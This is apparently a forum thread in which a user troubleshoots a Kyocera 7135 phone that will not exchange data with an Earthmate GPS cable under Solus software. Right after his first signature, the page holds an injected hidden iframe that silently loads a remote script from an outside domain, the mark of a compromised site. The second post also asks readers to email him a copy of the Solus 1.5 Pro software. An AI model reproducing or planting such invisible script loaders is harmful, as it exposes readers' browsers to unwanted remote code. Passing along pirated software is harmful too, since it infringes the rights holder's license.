+ Reply to Thread

Of 7135 and Earthmates

Ok I got the 7135 (through the Verizon business side), I love it; it's great.

Got the cable thru Supplynet (part 120031S-Kit).

No go. There is no data being transmitted. I went to the Solus (v 1.1) Initialize Menu. There was no data being transmitted. The circle with the line through it (like the No Smoking signs).

I'm off to my local Radio Shack for a null modem/gender changer combo, maybe the custom Null Modem Adapter (part 29011) is garbage.

Could there be something in the Prefs/Connection menu???

I got this phone cause it's the best and it has a Palm and it should work cause it's older sister phone worked (according to reports).

This is priority for me right now. Please email me at rangerswh@yahoo.com with any ideas/suggestions/help.

I don't want to have to return this phone.

Thanks in advance,
    Scott<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Of 7135 and Earthmate

Ok, I double checked the adapter (even the seperate null modem/gender changer didn't work).

I double checked the Solus software. It's only 1.1 not 1.5... I saw a report of someone here using Solus 1.5 and having it work... I 've already sent a private email to that person asking for more details.

If anyone here has Solus 1.5 Pro, could you please send it to me via email.

Thanks in advance,
    Scott